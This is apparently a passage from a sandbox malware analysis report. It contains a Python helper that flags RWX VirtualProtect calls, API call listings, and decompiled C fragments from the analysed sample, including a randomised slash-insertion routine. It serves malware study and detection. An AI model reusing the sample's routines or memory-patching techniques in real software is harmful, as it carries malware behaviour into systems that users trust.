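    hits: List[Tuple[int, int, int]] = []
    for fn in blocks:
        for c in fn.direct():
            if c.api != "VirtualProtect" or len(c.args) < 3:
                continue
            new_prot = c.args[2]
            if new_prot in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY):
                size = c.args[1] if c.args[1] is not None else -1
                hits.append((c.ref, size, new_prot))
    return hits

# Sample input: two API blocks copied from this report's listing.
SAMPLE = """\
APIs
• VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
• VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 0557A5B3
• RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557A5C2
• RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557A5E0
• GetLastError.KERNEL32(?,?), ref: 0557A5F0
Memory Dump Source
APIs
  • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
• memset.NTDLL ref: 05592521
• lstrlen.KERNEL32(00000000), ref: 05592531
• strcpy.NTDLL ref: 05592548
• StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05592552
Memory Dump Source
"""

if __name__ == "__main__":
    for ref, size, prot in flag_rwx_protect(parse_api_blocks(SAMPLE)):
        print(f"RWX VirtualProtect at {ref:08X}: {size} bytes -> 0x{prot:02X}")
```

Only the first VirtualProtect is reported: the restoring call carries '?' as its new protection and is skipped. The same parser can be pointed at the whole listing to pivot on other patterns from the report's signature list, for example RegisterWaitForSingleObject or OpenFileMappingA call sites.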

                                                          APIs
                                                            • Part of subcall function 05591B2C: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,0557190C,?,00000001,?,?), ref: 05591B62
                                                            • Part of subcall function 05591B2C: memset.NTDLL ref: 05591BD8
                                                            • Part of subcall function 05591B2C: memset.NTDLL ref: 05591BEC
                                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 05578488
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 055784AF
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 055784F4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 05578505
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                          • String ID:
                                                          • API String ID: 1065503980-0
                                                          • Opcode ID: a40ab8f84aae253b2f47ddcdb4d652962b368956ad0c7e5487b5778e55f1336a
                                                          • Instruction ID: bca7c491dd2a079d36893cc715c7fb0377d7b92bc5af19d3f83d2c5fb0b98372
                                                          • Opcode Fuzzy Hash: a40ab8f84aae253b2f47ddcdb4d652962b368956ad0c7e5487b5778e55f1336a
                                                          • Instruction Fuzzy Hash: A2218075A0020AFFDF10AFA5EC89EAD7FBAFB44218F014066F905A6110DB34AD48EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,0557190C,?,00000001,?,?), ref: 05591B62
                                                          • memset.NTDLL ref: 05591BD8
                                                          • memset.NTDLL ref: 05591BEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID: g*+%
                                                          • API String ID: 1529149438-2400975550
                                                          • Opcode ID: 07aa32d725111938068852d0ab68d61d1a55a98dde1a77b38b4b89460e224e44
                                                          • Instruction ID: 9a7093e823c0454c2e8c09ed277e14ecda0445c6c57245b3d3b539f7e95e4f59
                                                          • Opcode Fuzzy Hash: 07aa32d725111938068852d0ab68d61d1a55a98dde1a77b38b4b89460e224e44
                                                          • Instruction Fuzzy Hash: B6216B75A0052ABBDF11AFA5CC45FAEBBB9FF88640F044065F904E7250E738DA00CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                           			E00E53AD2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                           				intOrPtr _v8;
                                                           				void* _v12;
                                                           				void* _v16;
                                                           				intOrPtr _t26;
                                                           				intOrPtr* _t28;
                                                           				intOrPtr _t31;
                                                           				intOrPtr* _t32;
                                                           				void* _t39;
                                                           				int _t46;
                                                           				intOrPtr* _t47;
                                                           				int _t48;
                                                           
                                                           				/* __eax is a COM-style object; every call below goes through its vtable.
                                                           				   On success _a4 receives a heap copy of a wide string and _a8 its size in bytes. */
                                                           				_t47 = __eax;
                                                           				_push( &_v12);
                                                           				_push(__eax);
                                                           				_t39 = 0;
                                                           				_t46 = 0;
                                                           				_t26 =  *((intOrPtr*)( *__eax + 0x24))();   /* vtable slot at +0x24, called as (this, &_v12): returns an HRESULT, _v12 receives a second object */
                                                           				_v8 = _t26;
                                                           				if(_t26 < 0) {                                /* FAILED(hr): return it unchanged */
                                                           					L13:
                                                           					return _v8;
                                                           				}
                                                           				if(_v12 == 0) {                               /* no object yet: wait 200 ms and retry the same call once */
                                                           					Sleep(0xc8);
                                                           					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                           				}
                                                           				if(_v8 >= _t39) {
                                                           					_t28 = _v12;
                                                           					if(_t28 != 0) {
                                                           						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);   /* slot at +0x100 on the second object: returns a BSTR in _v16 */
                                                           						_v8 = _t31;
                                                           						if(_t31 >= 0) {
                                                           							_t46 = lstrlenW(_v16);                /* length in WCHARs */
                                                           							if(_t46 != 0) {
                                                           								_t46 = _t46 + 1;                  /* plus terminator */
                                                           								_t48 = _t46 + _t46;               /* byte count */
                                                           								_t39 = E00E55FBC(_t48);           /* internal heap-allocation helper */
                                                           								if(_t39 == 0) {
                                                           									_v8 = 0x8007000e;             /* E_OUTOFMEMORY */
                                                           								} else {
                                                           									memcpy(_t39, _v16, _t48);
                                                           								}
                                                           								__imp__#6(_v16);                  /* OLEAUT32 ordinal 6 = SysFreeString; not reached when lstrlenW returned 0 */
                                                           							}
                                                           						}
                                                           						_t32 = _v12;
                                                           						 *((intOrPtr*)( *_t32 + 8))(_t32);    /* vtable slot +8 = IUnknown::Release on the second object */
                                                           					}
                                                           					 *_a4 = _t39;                             /* NULL when the string was empty or the allocation failed */
                                                           					 *_a8 = _t46 + _t46;
                                                           				}
                                                           				goto L13;
                                                           			}

                                                           (The per-statement address column that accompanied this listing, 0x00e53ade through 0x00e53b8e, is omitted here; the call sites are given under APIs below.)

                                                          APIs
                                                          • Sleep.KERNEL32(000000C8), ref: 00E53B00
                                                          • lstrlenW.KERNEL32(?), ref: 00E53B36
                                                          • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00E53B57
                                                          • SysFreeString.OLEAUT32(?), ref: 00E53B6B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 68bca8c8586df0e035bee903edbb0b4cf9761ef184102feb111d5680565d4a67
                                                          • Instruction ID: 967a08cc87c7369b43beb42cd74130db542e083c1537f881b67d4ce116775a9f
                                                          • Opcode Fuzzy Hash: 68bca8c8586df0e035bee903edbb0b4cf9761ef184102feb111d5680565d4a67
                                                          • Instruction Fuzzy Hash: 84214C75A00209EFCB10DFA8C88499EBBB8EF49356B104969E905E7211E7309E08CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 05592521
                                                          • lstrlen.KERNEL32(00000000), ref: 05592531
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • strcpy.NTDLL ref: 05592548
                                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05592552
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                          • String ID:
                                                          • API String ID: 528014985-0
                                                          • Opcode ID: 6c714b63823338bc2efb7455c0c61eddd26efc497289f3507549cb659bbfdbfc
                                                          • Instruction ID: 4a9b48d8baa441306aa6665de3db606ff91a1b7474826068fa01d6c26f68bbbd
                                                          • Opcode Fuzzy Hash: 6c714b63823338bc2efb7455c0c61eddd26efc497289f3507549cb659bbfdbfc
                                                          • Instruction Fuzzy Hash: 40219579118706BFEB24AF64E849B2A77EDFF84321F00841AF8579A141EF7DD4049B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05593F2C
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05593F47
                                                          • GetLastError.KERNEL32(?,?,?), ref: 05593FB5
                                                          • GetLastError.KERNEL32(?,?,?), ref: 05593FC4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalErrorLastSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 2124651672-0
                                                          • Opcode ID: 219bdf11904ace752c0a6cf3e8bc063bdfd49edef8338ab76bf0dd7b530684f1
                                                          • Instruction ID: 5cf64fb6674d67bf1519f5562804ef78aed22ec15f99e55ab4cab46fc1196cde
                                                          • Opcode Fuzzy Hash: 219bdf11904ace752c0a6cf3e8bc063bdfd49edef8338ab76bf0dd7b530684f1
                                                          • Instruction Fuzzy Hash: 56215A36511208EFCF12CFA4D945A9EBBB9FF44711F028556F806A7250CB38DA19EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0557C383
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 0557C3C7
                                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0557C40A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?), ref: 0557C42D
                                                            • Part of subcall function 0558A0E5: GetTickCount.KERNEL32 ref: 0558A0F5
                                                            • Part of subcall function 0558A0E5: CreateFileW.KERNEL32(05579E67,80000000,00000003,0559C1A8,00000003,00000000,00000000,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A112
                                                            • Part of subcall function 0558A0E5: GetFileSize.KERNEL32(05579E67,00000000,?,00000001,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A145
                                                            • Part of subcall function 0558A0E5: CreateFileMappingA.KERNEL32(05579E67,0559C1A8,00000002,00000000,00000000,05579E67), ref: 0558A159
                                                            • Part of subcall function 0558A0E5: lstrlen.KERNEL32(05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A175
                                                            • Part of subcall function 0558A0E5: lstrcpy.KERNEL32(?,05579E67), ref: 0558A185
                                                            • Part of subcall function 0558A0E5: HeapFree.KERNEL32(00000000,05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1A0
                                                            • Part of subcall function 0558A0E5: CloseHandle.KERNEL32(05579E67,?,00000001,?,05579E67), ref: 0558A1B2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                          • String ID:
                                                          • API String ID: 3239194699-0
                                                          • Opcode ID: a063c04c549d5a49191ebb4a7166949ca67cb740fa716291d9e1c2d27c1e0335
                                                          • Instruction ID: 2f50e7d63bb89f9edcc50a7bf625db01520aa1994ff1c5422dd4f0df7df46b66
                                                          • Opcode Fuzzy Hash: a063c04c549d5a49191ebb4a7166949ca67cb740fa716291d9e1c2d27c1e0335
                                                          • Instruction Fuzzy Hash: D1213B3190020DEBDF21DF65ED49EEE7BBAFF84351F140126F82AA2161E7349949DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05591957: GetTickCount.KERNEL32 ref: 0559196D
                                                            • Part of subcall function 05591957: wsprintfA.USER32 ref: 055919AE
                                                            • Part of subcall function 05591957: GetModuleHandleA.KERNEL32(00000000), ref: 055919C0
                                                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 0558C612
                                                          • GetLastError.KERNEL32 ref: 0558C62C
                                                          • RtlExitUserThread.NTDLL(?), ref: 0558C646
                                                          • GetLastError.KERNEL32 ref: 0558C686
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
                                                          • String ID:
                                                          • API String ID: 1798890819-0
                                                          • Opcode ID: 47f19f801a78903c78005a2426d771f26611c7121009a23951efc5c2f64a77e1
                                                          • Instruction ID: 266f20e49fd72a1f1caea88739d19e468f18f202d53eabac580313dc5e6a9cc4
                                                          • Opcode Fuzzy Hash: 47f19f801a78903c78005a2426d771f26611c7121009a23951efc5c2f64a77e1
                                                          • Instruction Fuzzy Hash: 0D116D71014245AFE710AF6AED89D7B7FBCFAC6661B01092AF852D2040DB39DC09DB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 055770BE
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0557BF24,?), ref: 055770D0
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0557BF24,?), ref: 055770E8
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,0557BF24,?), ref: 05577103
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                          • String ID:
                                                          • API String ID: 1352878660-0
                                                          • Opcode ID: 7d3d546b4fbef0b229bc284bbc30a7bdfd204abe09ee9aa2c7747b79e5c5f802
                                                          • Instruction ID: 83df092624823710ad258cf3eec325e4b094220b3d982c99d1ca7f50912da9d3
                                                          • Opcode Fuzzy Hash: 7d3d546b4fbef0b229bc284bbc30a7bdfd204abe09ee9aa2c7747b79e5c5f802
                                                          • Instruction Fuzzy Hash: 37115871A1012DBADF21AAA5EC89EFFBF6DFF45790F144022F906E5050D7319A44EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05581675,?,00000000,?), ref: 0559296D
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05581675,?,00000000,?), ref: 0559298F
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 055929BB
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 055929CE
                                                            • Part of subcall function 0557AE41: strstr.NTDLL ref: 0557AF19
                                                            • Part of subcall function 0557AE41: strstr.NTDLL ref: 0557AF6C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3712611166-0
                                                          • Opcode ID: 539d5baa89105529908a2211b9c78729e055fb13b9996747bf6dff3cd333bfe3
                                                          • Instruction ID: ba939c5f54c22288dfddaa6c481df667dbb56a63a0689e96f2fc3c796f6fb841
                                                          • Opcode Fuzzy Hash: 539d5baa89105529908a2211b9c78729e055fb13b9996747bf6dff3cd333bfe3
                                                          • Instruction Fuzzy Hash: 9611677660011ABFCF11AFA1DC88CEE7FADFF05294B014125F90696110DB39DE45ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?), ref: 05591AA1
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05591AB8
                                                          • StrChrA.SHLWAPI(00000000,0000002E), ref: 05591AC1
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 05591ADF
                                                            • Part of subcall function 0557E712: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002), ref: 0557E7E9
                                                            • Part of subcall function 0557E712: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001), ref: 0557E804
                                                            • Part of subcall function 0557E712: RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557E828
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 105881616-0
                                                          • Opcode ID: bd03689f6954c99c32d8e22353527ec48879dff28803ffbed465717f04ef9f80
                                                          • Instruction ID: a6d2fbd64909591e0716286119b4db478bd524acf84ebb0d933c021d8697a6e6
                                                          • Opcode Fuzzy Hash: bd03689f6954c99c32d8e22353527ec48879dff28803ffbed465717f04ef9f80
                                                          • Instruction Fuzzy Hash: B7214C74A0060AEFDF15DF65C948EAEBBFABF84304F10849AE416DB250EB78D944DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557DCE9
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0557DD0D
                                                          • RegCloseKey.ADVAPI32(?), ref: 0557DD65
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0557DD36
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                                          • String ID:
                                                          • API String ID: 453107315-0
                                                          • Opcode ID: 5a2d617097ce92ff48f3c016c33991556160b8763a6e53390bc4211c90aed35f
                                                          • Instruction ID: 8d174b85fdea4b76e539081b238594daa9c833fabf8eeb9319732e73601923c9
                                                          • Opcode Fuzzy Hash: 5a2d617097ce92ff48f3c016c33991556160b8763a6e53390bc4211c90aed35f
                                                          • Instruction Fuzzy Hash: 9D2193B590010CFBDB119F99E8848EEBFBAFF84350F108066E805A6160E7719B54DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32 ref: 05571059
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05571071
                                                          • memcpy.NTDLL(00000000,?,-00000008), ref: 055710B5
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 055710D6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 92a0e9b83962737405794185dae37179007dc496e2d11a43c801cfbdb765d373
                                                          • Instruction ID: 5049677c157be61c169a195f5eee3bc52b145724cfbeab961d109a649bb24c9b
                                                          • Opcode Fuzzy Hash: 92a0e9b83962737405794185dae37179007dc496e2d11a43c801cfbdb765d373
                                                          • Instruction Fuzzy Hash: BD112C72A10219BFC7108B69EC85D9EBFADEBC1260B050177F505D7240EA759D08D760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00E54FE5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0xe5a290, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0xe5a2a8; // 0xbedf2ab
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0xe5a2a8 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E571E9,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E54FF0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00E55008
                                                          • memcpy.NTDLL(00000000,051B9630,-00000008,?,?,?,00E571E9,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E5504C
                                                          • memcpy.NTDLL(00000001,051B9630,00000001,00E54A9F,00000000,051B9630), ref: 00E5506D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: fb40accc711da31af78f943dea7f44921d19f3a77b967384a20fa6b16e574377
                                                          • Instruction ID: 3ff5889642f31cf67e961e6186f9cd815c6e401ae690ca8f54778e704743e0fe
                                                          • Opcode Fuzzy Hash: fb40accc711da31af78f943dea7f44921d19f3a77b967384a20fa6b16e574377
                                                          • Instruction Fuzzy Hash: 8F110A72A00214BFD7148F6ADC85E9FBFBDDB81351F040675FA04A71A0E6719D08D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05590C70,00000000,00000000), ref: 0558EC81
                                                          • GetLastError.KERNEL32(?,?,?,05590C70,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0557220D,?,0000001E), ref: 0558EC89
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide
                                                          • String ID:
                                                          • API String ID: 203985260-0
                                                          • Opcode ID: 67eef053e82d0d9457960a1cfb717784a2475f18f2be15ffb65497fde59f8aa3
                                                          • Instruction ID: 7e61e3d30e32cb8b105ae8616a615f8352d9676f900f5694b4531c0664dd8318
                                                          • Opcode Fuzzy Hash: 67eef053e82d0d9457960a1cfb717784a2475f18f2be15ffb65497fde59f8aa3
                                                          • Instruction Fuzzy Hash: 1401AC756082557F8730BA369C49C3BBE7DFBC6760B110A1DF961E2240DA315804D671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,05589FEF,?,?,?), ref: 05590709
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • mbstowcs.NTDLL ref: 05590723
                                                          • lstrlen.KERNEL32(?), ref: 0559072E
                                                          • mbstowcs.NTDLL ref: 05590748
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                          • String ID:
                                                          • API String ID: 1961997177-0
                                                          • Opcode ID: 762e2b440b595b3bd5ff9c0c92fb7cd11212a5f7319bafe36a9f0a341d096ff8
                                                          • Instruction ID: 46f2671cbadc25b3f68edb463b8d8bb673defaef7bf80e6b6043417fcde01d2b
                                                          • Opcode Fuzzy Hash: 762e2b440b595b3bd5ff9c0c92fb7cd11212a5f7319bafe36a9f0a341d096ff8
                                                          • Instruction Fuzzy Hash: 9B01B137A10209B7CB216BB69C4DF9F7BADFFC5360F104426B506A3100EA79D9108BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05578642
                                                          • lstrlen.KERNEL32(059BAAC0), ref: 05578663
                                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0557867B
                                                          • lstrcpy.KERNEL32(00000000,059BAAC0), ref: 0557868D
                                                          Memory Dump Source
